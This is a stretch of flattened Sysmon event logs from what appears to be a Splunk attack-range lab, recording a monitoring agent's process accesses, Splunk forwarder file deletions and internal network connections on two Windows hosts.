Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC46-63C7-3500-00000000B002}2744C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000016225Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:02.791{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC45-63C7-2200-00000000B002}2524C:\Windows\system32\wbem\unsecapp.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000016224Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:02.776{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000016223Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:02.768{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1E00-00000000B002}1200C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000016222Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:02.766{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1D00-00000000B002}1080C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000016221Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:02.752{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1B00-00000000B002}1944C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000016220Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:02.749{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1900-00000000B002}1888C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000016219Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:02.737{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1800-00000000B002}1804C:\Windows\System32\spoolsv.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000016218Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:02.733{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1700-00000000B002}1260C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000016217Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:02.703{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1600-00000000B002}1224C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000016216Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:02.692{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1500-00000000B002}1104C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000016215Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:02.677{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1400-00000000B002}1084C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000016214Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:02.662{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1300-00000000B002}440C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000016213Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:02.653{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1200-00000000B002}1012C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000016212Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:02.607{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1100-00000000B002}952C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000016211Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:02.592{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1000-00000000B002}944C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000016210Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:02.580{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0F00-00000000B002}908C:\Windows\system32\dwm.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000016209Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:02.570{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0E00-00000000B002}900C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000016208Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:02.560{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0D00-00000000B002}780C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000016207Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:02.542{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0C00-00000000B002}728C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000016206Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:02.531{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0B00-00000000B002}632C:\Windows\system32\lsass.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000016205Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:02.527{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0900-00000000B002}572C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 23542300x800000000000000016204Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:02.176{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FD4A564EE8337BDBF6CA14DD0CA847F9,SHA256=55B42A9124559E4FBCE77C323E67C99CB742C7CAD997C2A219D2928CFBDED84C,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000041520Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:59.605{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56285-false10.0.1.12-8000- 23542300x800000000000000041522Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:03.963{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=642FF8289E71BA14D5B3F89C11F35E25,SHA256=0F312531F382CD70FA6245691B885AFB8BB600A7F2FCEC2B07E898F1A21B8436,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000016237Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:02.025{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50084-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 23542300x800000000000000016236Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:03.459{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CC3F48F72CC224796B8B0E8390F03604,SHA256=42171783DC48A817BFB5591492149C7D061D0E0F7EEB4CC5F0CA33EAE22DD6EF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000016239Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:04.557{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FE8BF80380EC3A75010BED26149FBEB2,SHA256=A6EA1393733CECFCE9F93A7E10FB47C2D0AA222B3B871BA218A7949963942BEF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000016238Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:04.027{E5A8D418-DCC0-63C7-9F00-00000000B002}3096NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=B7E616F96B7BBFB82BF7130F79C861FF,SHA256=784F4924BD8FD182C26EA63E1A41C4AA6BD4EA85FEA6DA0417976E9A8570384D,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000016241Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:03.891{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50085-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8089- 23542300x800000000000000016240Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:05.635{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1DD6448F333EB173179660DFAE310754,SHA256=F61C60EFA2EA76B3A8C1142AC2BCB2A93FCCD95B05507C6962472F0DF551813F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000041523Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:05.078{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1D764242782965286275DD2AC144B762,SHA256=DBEC67BB5CEB442CABF7B222EE5FBA46C022A92BE9C6085D728E4A3B21875DBD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000016242Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:06.742{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8DDA12842577A21D1B91F959362FCE11,SHA256=F9981F698B2289412AF4495039115A30A8C53BA038F9D208944DC63F1DA3B0B7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000041524Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:06.195{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=419E9CC5E4255FE0D8FB2201A8218D12,SHA256=E0C8EFA4FC16F46DE1A3ED7376638943B948314988DC36C8CFAAC4F3939B2614,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000016244Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:07.937{E5A8D418-DC44-63C7-1B00-00000000B002}1944NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0027b8f3633f25268\channels\health\respondent-20230118114719-032MD5=2BA10D7196373860DD67B47CDBC7ACF2,SHA256=36B87809E8BE9B960CE5E03B4CEC64D52EF7C46D9877F9C3402AB54869FC5CBA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000016243Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:07.840{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=81BB60FCCFFD69ADA72C45C432C70B90,SHA256=23A557C6B4CFFECB9348F04476EABC9570D146B1D6F8969B07482D8F155EFC36,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000041525Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:07.278{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=18CBA2FD9910A4E3B649CF0427556594,SHA256=3AF740CE4EF8A06DE6831278EC8BEED27948D17C821C18D1D326D23B9CE4DBDD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000016246Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:08.938{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2E47573735B24D1C4DD5894E7D91AE85,SHA256=D4A7796AD6D2EBC255EFEFAE4449816E5AA4D1D7FEDEF18F723A552D117783B8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000016245Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:08.937{E5A8D418-DC44-63C7-1B00-00000000B002}1944NT AUTHORITY\SYSTEMC:\Program 